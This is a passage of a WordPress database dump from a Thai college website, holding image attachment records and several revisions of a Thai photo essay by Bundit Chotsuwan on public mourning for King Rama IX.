(4459, 3, '2018-11-13 13:14:44', '2018-11-13 06:14:44', '', '87-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '87-bundit-chotsuwan-copy', '', '', '2018-11-13 13:14:44', '2018-11-13 06:14:44', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/87-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4460, 3, '2018-11-13 13:14:57', '2018-11-13 06:14:57', '', '96-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '96-bundit-chotsuwan-copy', '', '', '2018-11-13 13:14:57', '2018-11-13 06:14:57', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/96-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4461, 3, '2018-11-13 13:15:09', '2018-11-13 06:15:09', '', '97-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '97-bundit-chotsuwan-copy', '', '', '2018-11-13 13:15:09', '2018-11-13 06:15:09', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/97-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4462, 3, '2018-11-13 13:15:21', '2018-11-13 06:15:21', '', '100-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '100-bundit-chotsuwan-copy', '', '', '2018-11-13 13:15:21', '2018-11-13 06:15:21', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/100-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4463, 3, '2018-11-13 14:07:48', '2018-11-13 07:07:48', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>“ธ สถิตในดวงใจไทยนิรันดร์”</strong></span></h3>\r\n<p style=\"text-align: center;\"><img class=\"aligncenter size-large wp-image-4437\" src=\"/wp-content/uploads/2018/11/1-Bundit-Chotsuwan-copy-1024x643.jpg\" alt=\"\" width=\"640\" height=\"402\" />พสกนิกรมารอรับขบวนอัญเชิญพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวังท่ามกลางความโศกเศร้าเงียบงันตลอดระยะทาง</p>\r\n<img class=\"aligncenter size-large wp-image-4438\" src=\"/wp-content/uploads/2018/11/6-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และอาสาสมัครต้องรับมือกับอาการหน้ามืดเป็นลม เนื่องจากอากาศที่ร้อนอบอ้าวและประชาชนจํานวนมาก</p>\r\n<img class=\"aligncenter size-large wp-image-4439\" src=\"/wp-content/uploads/2018/11/7-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หนึ่งในกลุ่มชาติพันธุ์ที่มาแสดงความอาลัยและประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามประเพณีของแต่ละกลุ่ม คือ “ชาวอาข่า” ในภาพหญิงชาวอาข่า 5 คน กําลังประกอบพิธีกรรมและท่อง “บทสวด” ที่ใช้ในพิธีศพตามวัฒนธรรมอาข่า</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ผู้ปิดทองหลังพระ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4440\" src=\"/wp-content/uploads/2018/11/9-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">บุคลากรในหน่วยปฐมพยาบาลในสถานที่ต่างๆ ที่มีการรวมตัวกันของพสกนิกรชาวไทย เพื่อทํากิจกรรมถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 นั้น คือ “ผู้ปิดทองหลังพระ”อย่างแท้จริง เพราะด้วยสภาพอากาศที่อบอ้าวและความเนืองแน่นของประชาชนที่มารวมตัวกันส่งผลให้ผู้คนเจ็บป่วยเป็นจํานวนมาก ในภาพนี้พยาบาลและอาสาสมัคร กําลังให้การช่วยเหลือแก่หญิง 2 คนที่เป็นลมขณะรอคิวเข้ากราบสักการะพระบรมศพ ณ บริเวณเต็นท์ปฐมพยาบาลด้านข้างสนามหลวงภายใต้แดดที่ร้อนจัดและอากาศที่อบอ้าว</p>\r\n<img class=\"aligncenter size-large wp-image-4441\" src=\"/wp-content/uploads/2018/11/26-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนจากทั่วสารทิศมารวมตัวกันแต่เช้าตรู่ เพื่อเตรียมร้องเพลงสรรเสริญพระบารมีครั้งประวัติศาสตร์ร่วมกันเสียงเพลงในคํ่าคืนนั้นดังกึกก้องไปทั่วท้องสนามหลวงและตราตรึงในหัวใจชาวไทยตลอดไป</p>\r\n<img class=\"aligncenter size-large wp-image-4442\" src=\"/wp-content/uploads/2018/11/28-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เหล่าพยาบาลรวมตัวกันถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ กระทรวงสาธารณสุข</p>\r\n<img class=\"aligncenter size-large wp-image-4443\" src=\"/wp-content/uploads/2018/11/29-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พยาบาลท่านหนึ่งกําลังปฏิบัติหน้าที่ดูแลและให้ความช่วยเหลือผู้คนอย่างใกล้ชิดท่ามกลางศิษย์เก่าและศิษย์ปัจจุบันของมหาวิทยาลัยธรรมศาสตร์ที่มารวมตัวแสดงความอาลัยต่อในหลวงรัชกาลที่ 9 ด้วยการแปรอักษร ณ สนามฟุตบอลมหาวิทยาลัยธรรมศาสตร์ วิทยาเขตท่าพระจันทร์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในหลวงของแผ่นดิน”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4444\" src=\"/wp-content/uploads/2018/11/30-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เด็กน้อยชูพระบรมฉายาลักษณ์ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ในขณะรอรับขบวนอัญเชิญพระบรมศพ ที่เคลื่อนจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวัง สู่พระที่นั่งดุสิตมหาปราสาท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"รวมใจถวายความอาลัย\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4445\" src=\"/wp-content/uploads/2018/11/34-Bundit-Chotsuwan-copy-1024x668.jpg\" alt=\"\" width=\"640\" height=\"418\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แสงเทียนแห่งสยาม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4446\" src=\"/wp-content/uploads/2018/11/41-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แด่พระองค์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4447\" src=\"/wp-content/uploads/2018/11/44-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">วีรชัย บาลไธสง ศิลปินอิสระ ตั้งใจว่าจะวาดว่าพระบรมสาทิสลักษณ์มาถวายให้ในหลวงรัชกาลที่ 9 ในวันที่ 5 ธันวาคม พ.ศ. 2559 แต่ยังไม่ทันถึงวันนั้น ข่าวการเสด็จสวรรคตของในหลวง ในวันที่ 13 ตุลาคม พ.ศ. 2559 ทําให้เขามายืนเฝ้ารับขบวนอัญเชิญพระบรมศพที่หน้าโรงพยาบาลศิริราช พร้อมกับชู “ภาพที่วาดไม่เสร็จ” นั้นด้วยความอาลัยยิ่ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"พยาบาลของพ่อ ณ ศิริราช\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4448\" src=\"/wp-content/uploads/2018/11/45-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภาพประทับใจจากงานนิทรรศการ “น้อมรําลึกในหลวงรัชกาลที่ ๙”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4449\" src=\"/wp-content/uploads/2018/11/50-Bundit-Chotsuwan-copy-1024x646.jpg\" alt=\"\" width=\"640\" height=\"404\" />\r\n<p style=\"text-align: center;\">ณ หอศิลปวัฒนธรรมแห่งกรุงเทพมหานคร โดยสมาคมถ่ายภาพแห่งประเทศไทยในพระบรมราชูปถัมภ์ ภายในงานจัดแสดงภาพถ่าย 89 ภาพ จากช่างภาพ 89 คน ที่พร้อมใจถ่ายทอดความรู้สึกและความทรงจําที่มีต่อในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รวมใจเป็นหนึ่งเดียว”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4450\" src=\"/wp-content/uploads/2018/11/53-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แม้แดดยามบ่ายจะร้อน แต่ผู้คนก็ยิ่งหลั่งไหลเข้ามาในบริเวณรอบกําแพงพระบรมมหาราชวัง และในท้องสนามหลวง เพื่อร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนแสดงความอาลัย</p>\r\n<img class=\"aligncenter size-large wp-image-4451\" src=\"/wp-content/uploads/2018/11/56-Bundit-Chotsuwan-copy-1024x684.jpg\" alt=\"\" width=\"640\" height=\"428\" />\r\n<p style=\"text-align: center;\">ในคํ่าคืนที่เงียบงันและแสนเศร้าของชาวไทย พสกนิกรต่างนําดอกไม้มากราบแสดงความอาลัยต่อการจากไปของในหลวงผู้เป็นที่รักยิ่ง\r\nตลอดแนวกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แสงเทียนแห่งสยาม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4452\" src=\"/wp-content/uploads/2018/11/60-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ณ เวลา 0 .09 น. ของคืนส่งท้ายปี เก่าต้อนรับปี ใหม่ วันที่ 1 มกราคม พ.ศ. 25 60 บริเวณท้องสนามหลวงสว่างไสวไปด้วยแสงเทียน และกึกก้องไปด้วยเสียงสวดมนต์และเสียงเพลงสรรเสริญพระบารมีของประชาชนที่มาร่วมงาน “แสงเทียนแห่งสยาม” ซึ่งรัฐบาลจัดขึ้นเพื่อถวายเป็นพระราชกุศล แด่ในหลวงรัชกาลที่ 9 และพระบรมวงศานุวงศ์ทุกพระองค์ รวมทั้งเพื่อเสริมความเป็นสิริมงคลแก่ประชาชนชาวไทย ให้มีความสุขตลอดปี</p>\r\n<img class=\"aligncenter size-large wp-image-4453\" src=\"/wp-content/uploads/2018/11/63-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนจากทั่วสารทิศมารวมตัวกันแต่เช้าตรู่ เพื่อเตรียมร้องเพลงสรรเสริญพระบารมีครั้งประวัติศาสตร์ร่วมกัน เสียงเพลงในคํ่าคืนนั้นดังกึกก้องไปทั่วท้องสนามหลวงและตราตรึงในหัวใจชาวไทยตลอดไป</p>\r\n<img class=\"aligncenter size-large wp-image-4454\" src=\"/wp-content/uploads/2018/11/66-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4455\" src=\"/wp-content/uploads/2018/11/67-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พยาบาล แพทย์ และประชาชนที่มาร่วมงาน “จุฬาฯ เทิด ธ พระภูมิพล”ณ บริเวณลานพระบรมราชานุสาวรีย์ รัชกาลที่ 6 กําลังยืนสงบนิ่งต่อหน้าพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 เพื่อแสดงความอาลัย และรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4456\" src=\"/wp-content/uploads/2018/11/68-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">บรรยากาศโดยรอบกําแพงพระบรมมหาราชวัง ประชาชนเดินทางมาแสดงอาลัยด้วยรําลึกในพระมหากรุณาธิคุณอย่างที่สุดมิได้ของพระบาทสมเด็จพระเจ้าอยู่หัวพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n<img class=\"aligncenter size-large wp-image-4457\" src=\"/wp-content/uploads/2018/11/71-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4458\" src=\"/wp-content/uploads/2018/11/75-Bundit-Chotsuwan-copy-1024x658.jpg\" alt=\"\" width=\"640\" height=\"411\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และบุคลากรจากคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัยและโรงพยาบาลจุฬาลงกรณ์ จุดเทียนถวายอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n<img class=\"aligncenter size-large wp-image-4459\" src=\"/wp-content/uploads/2018/11/87-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หน่วยแพทย์และพยาบาลตั้งจุดให้บริการครอบคลุมทั้งพื้นที่ท้องสนามหลวงและโดยรอบพระบรมมหาราชวัง เพื่อคอยดูแลสุขภาพของประชาชนที่เดินทางมารอเข้าถวายสักการะพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ พระที่นั่งดุสิตมหาปราสาท</p>\r\n<img class=\"aligncenter size-large wp-image-4460\" src=\"/wp-content/uploads/2018/11/96-Bundit-Chotsuwan-copy-1024x697.jpg\" alt=\"\" width=\"640\" height=\"436\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบพ่อครั้งสุดท้าย”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4461\" src=\"/wp-content/uploads/2018/11/97-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4462\" src=\"/wp-content/uploads/2018/11/100-Bundit-Chotsuwan-copy-1024x712.jpg\" alt=\"\" width=\"640\" height=\"445\" />', 'ภาพถ่าย โดย บัณฑิต โชติสุวรรณ', '', 'inherit', 'closed', 'closed', '', '4426-autosave-v1', '', '', '2018-11-13 14:07:48', '2018-11-13 07:07:48', '', 4426, 'http://www.technicrayong.ac.th/4426-autosave-v1/', 0, 'revision', '', 0),
(4464, 3, '2018-11-13 13:17:57', '2018-11-13 06:17:57', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>“ธ สถิตในดวงใจไทยนิรันดร์”</strong></span></h3>\r\n<p style=\"text-align: center;\"><img class=\"aligncenter size-large wp-image-4437\" src=\"/wp-content/uploads/2018/11/1-Bundit-Chotsuwan-copy-1024x643.jpg\" alt=\"\" width=\"640\" height=\"402\" />พสกนิกรมารอรับขบวนอัญเชิญพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวั\'ท่ามกลางความโศกเศร้าเงียบงันตลอดระยะทาง</p>\r\n ', 'ภาพถ่าย โดย บัณฑิต โชติสุวรรณ', '', 'inherit', 'closed', 'closed', '', '4426-revision-v1', '', '', '2018-11-13 13:17:57', '2018-11-13 06:17:57', '', 4426, 'http://www.technicrayong.ac.th/4426-revision-v1/', 0, 'revision', '', 0),
(4465, 3, '2018-11-13 13:19:30', '2018-11-13 06:19:30', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>“ธ สถิตในดวงใจไทยนิรันดร์”</strong></span></h3>\r\n<p style=\"text-align: center;\"><img class=\"aligncenter size-large wp-image-4437\" src=\"/wp-content/uploads/2018/11/1-Bundit-Chotsuwan-copy-1024x643.jpg\" alt=\"\" width=\"640\" height=\"402\" />พสกนิกรมารอรับขบวนอัญเชิญพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวังท่ามกลางความโศกเศร้าเงียบงันตลอดระยะทาง</p>\r\n<img class=\"aligncenter size-large wp-image-4438\" src=\"/wp-content/uploads/2018/11/6-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และอาสาสมัครต้องรับมือกับอาการหน้ามืดเป็นลม เนื่องจากอากาศที่ร้อนอบอ้าวและประชาชนจํานวนมาก</p>\r\n ', 'ภาพถ่าย โดย บัณฑิต โชติสุวรรณ', '', 'inherit', 'closed', 'closed', '', '4426-revision-v1', '', '', '2018-11-13 13:19:30', '2018-11-13 06:19:30', '', 4426, 'http://www.technicrayong.ac.th/4426-revision-v1/', 0, 'revision', '', 0),
(4466, 3, '2018-11-13 13:24:39', '2018-11-13 06:24:39', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>“ธ สถิตในดวงใจไทยนิรันดร์”</strong></span></h3>\r\n<p style=\"text-align: center;\"><img class=\"aligncenter size-large wp-image-4437\" src=\"/wp-content/uploads/2018/11/1-Bundit-Chotsuwan-copy-1024x643.jpg\" alt=\"\" width=\"640\" height=\"402\" />พสกนิกรมารอรับขบวนอัญเชิญพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวังท่ามกลางความโศกเศร้าเงียบงันตลอดระยะทาง</p>\r\n<img class=\"aligncenter size-large wp-image-4438\" src=\"/wp-content/uploads/2018/11/6-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และอาสาสมัครต้องรับมือกับอาการหน้ามืดเป็นลม เนื่องจากอากาศที่ร้อนอบอ้าวและประชาชนจํานวนมาก</p>\r\n<img class=\"aligncenter size-large wp-image-4439\" src=\"/wp-content/uploads/2018/11/7-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หนึ่งในกลุ่มชาติพันธุ์ที่มาแสดงความอาลัยและประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามประเพณีของแต่ละกลุ่ม คือ “ชาวอาข่า” ในภาพหญิงชาวอาข่า 5 คน กําลังประกอบพิธีกรรมและท่อง “บทสวด” ที่ใช้ในพิธีศพตามวัฒนธรรมอาข่า</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ผู้ปิดทองหลังพระ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4440\" src=\"/wp-content/uploads/2018/11/9-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">บุคลากรในหน่วยปฐมพยาบาลในสถานที่ต่างๆ ที่มีการรวมตัวกันของพสกนิกรชาวไทย เพื่อทํากิจกรรมถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 นั้น คือ “ผู้ปิดทองหลังพระ”อย่างแท้จริง เพราะด้วยสภาพอากาศที่อบอ้าวและความเนืองแน่นของประชาชนที่มารวมตัวกันส่งผลให้ผู้คนเจ็บป่วยเป็นจํานวนมาก ในภาพนี้พยาบาลและอาสาสมัคร กําลังให้การช่วยเหลือแก่หญิง 2 คนที่เป็นลมขณะรอคิวเข้ากราบสักการะพระบรมศพ ณ บริเวณเต็นท์ปฐมพยาบาลด้านข้างสนามหลวงภายใต้แดดที่ร้อนจัดและอากาศที่อบอ้าว</p>\r\n \r\n\r\n \r\n\r\n ', 'ภาพถ่าย โดย บัณฑิต โชติสุวรรณ', '', 'inherit', 'closed', 'closed', '', '4426-revision-v1', '', '', '2018-11-13 13:24:39', '2018-11-13 06:24:39', '', 4426, 'http://www.technicrayong.ac.th/4426-revision-v1/', 0, 'revision', '', 0),
(4467, 3, '2018-11-13 13:43:00', '2018-11-13 06:43:00', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>“ธ สถิตในดวงใจไทยนิรันดร์”</strong></span></h3>\r\n<p style=\"text-align: center;\"><img class=\"aligncenter size-large wp-image-4437\" src=\"/wp-content/uploads/2018/11/1-Bundit-Chotsuwan-copy-1024x643.jpg\" alt=\"\" width=\"640\" height=\"402\" />พสกนิกรมารอรับขบวนอัญเชิญพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวังท่ามกลางความโศกเศร้าเงียบงันตลอดระยะทาง</p>\r\n<img class=\"aligncenter size-large wp-image-4438\" src=\"/wp-content/uploads/2018/11/6-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และอาสาสมัครต้องรับมือกับอาการหน้ามืดเป็นลม เนื่องจากอากาศที่ร้อนอบอ้าวและประชาชนจํานวนมาก</p>\r\n<img class=\"aligncenter size-large wp-image-4439\" src=\"/wp-content/uploads/2018/11/7-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หนึ่งในกลุ่มชาติพันธุ์ที่มาแสดงความอาลัยและประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามประเพณีของแต่ละกลุ่ม คือ “ชาวอาข่า” ในภาพหญิงชาวอาข่า 5 คน กําลังประกอบพิธีกรรมและท่อง “บทสวด” ที่ใช้ในพิธีศพตามวัฒนธรรมอาข่า</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ผู้ปิดทองหลังพระ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4440\" src=\"/wp-content/uploads/2018/11/9-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">บุคลากรในหน่วยปฐมพยาบาลในสถานที่ต่างๆ ที่มีการรวมตัวกันของพสกนิกรชาวไทย เพื่อทํากิจกรรมถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 นั้น คือ “ผู้ปิดทองหลังพระ”อย่างแท้จริง เพราะด้วยสภาพอากาศที่อบอ้าวและความเนืองแน่นของประชาชนที่มารวมตัวกันส่งผลให้ผู้คนเจ็บป่วยเป็นจํานวนมาก ในภาพนี้พยาบาลและอาสาสมัคร กําลังให้การช่วยเหลือแก่หญิง 2 คนที่เป็นลมขณะรอคิวเข้ากราบสักการะพระบรมศพ ณ บริเวณเต็นท์ปฐมพยาบาลด้านข้างสนามหลวงภายใต้แดดที่ร้อนจัดและอากาศที่อบอ้าว</p>\r\n<img class=\"aligncenter size-large wp-image-4441\" src=\"/wp-content/uploads/2018/11/26-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนจากทั่วสารทิศมารวมตัวกันแต่เช้าตรู่ เพื่อเตรียมร้องเพลงสรรเสริญพระบารมีครั้งประวัติศาสตร์ร่วมกันเสียงเพลงในคํ่าคืนนั้นดังกึกก้องไปทั่วท้องสนามหลวงและตราตรึงในหัวใจชาวไทยตลอดไป</p>\r\n<img class=\"aligncenter size-large wp-image-4442\" src=\"/wp-content/uploads/2018/11/28-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เหล่าพยาบาลรวมตัวกันถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ กระทรวงสาธารณสุข</p>\r\n<img class=\"aligncenter size-large wp-image-4443\" src=\"/wp-content/uploads/2018/11/29-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พยาบาลท่านหนึ่งกําลังปฏิบัติหน้าที่ดูแลและให้ความช่วยเหลือผู้คนอย่างใกล้ชิดท่ามกลางศิษย์เก่าและศิษย์ปัจจุบันของมหาวิทยาลัยธรรมศาสตร์ที่มารวมตัวแสดงความอาลัยต่อในหลวงรัชกาลที่ 9 ด้วยการแปรอักษร ณ สนามฟุตบอลมหาวิทยาลัยธรรมศาสตร์ วิทยาเขตท่าพระจันทร์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในหลวงของแผ่นดิน”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4444\" src=\"/wp-content/uploads/2018/11/30-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เด็กน้อยชูพระบรมฉายาลักษณ์ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ในขณะรอรับขบวนอัญเชิญพระบรมศพ ที่เคลื่อนจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวัง สู่พระที่นั่งดุสิตมหาปราสาท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"รวมใจถวายความอาลัย\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4445\" src=\"/wp-content/uploads/2018/11/34-Bundit-Chotsuwan-copy-1024x668.jpg\" alt=\"\" width=\"640\" height=\"418\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แสงเทียนแห่งสยาม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4446\" src=\"/wp-content/uploads/2018/11/41-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แด่พระองค์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4447\" src=\"/wp-content/uploads/2018/11/44-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">วีรชัย บาลไธสง ศิลปินอิสระ ตั้งใจว่าจะวาดว่าพระบรมสาทิสลักษณ์มาถวายให้ในหลวงรัชกาลที่ 9 ในวันที่ 5 ธันวาคม พ.ศ. 2559 แต่ยังไม่ทันถึงวันนั้น ข่าวการเสด็จสวรรคตของในหลวง ในวันที่ 13 ตุลาคม พ.ศ. 2559 ทําให้เขามายืนเฝ้ารับขบวนอัญเชิญพระบรมศพที่หน้าโรงพยาบาลศิริราช พร้อมกับชู “ภาพที่วาดไม่เสร็จ” นั้นด้วยความอาลัยยิ่ง</p>\r\n ', 'ภาพถ่าย โดย บัณฑิต โชติสุวรรณ', '', 'inherit', 'closed', 'closed', '', '4426-revision-v1', '', '', '2018-11-13 13:43:00', '2018-11-13 06:43:00', '', 4426, 'http://www.technicrayong.ac.th/4426-revision-v1/', 0, 'revision', '', 0),
(4468, 3, '2018-11-13 13:51:28', '2018-11-13 06:51:28', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>“ธ สถิตในดวงใจไทยนิรันดร์”</strong></span></h3>\r\n<p style=\"text-align: center;\"><img class=\"aligncenter size-large wp-image-4437\" src=\"/wp-content/uploads/2018/11/1-Bundit-Chotsuwan-copy-1024x643.jpg\" alt=\"\" width=\"640\" height=\"402\" />พสกนิกรมารอรับขบวนอัญเชิญพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวังท่ามกลางความโศกเศร้าเงียบงันตลอดระยะทาง</p>\r\n<img class=\"aligncenter size-large wp-image-4438\" src=\"/wp-content/uploads/2018/11/6-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และอาสาสมัครต้องรับมือกับอาการหน้ามืดเป็นลม เนื่องจากอากาศที่ร้อนอบอ้าวและประชาชนจํานวนมาก</p>\r\n<img class=\"aligncenter size-large wp-image-4439\" src=\"/wp-content/uploads/2018/11/7-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p 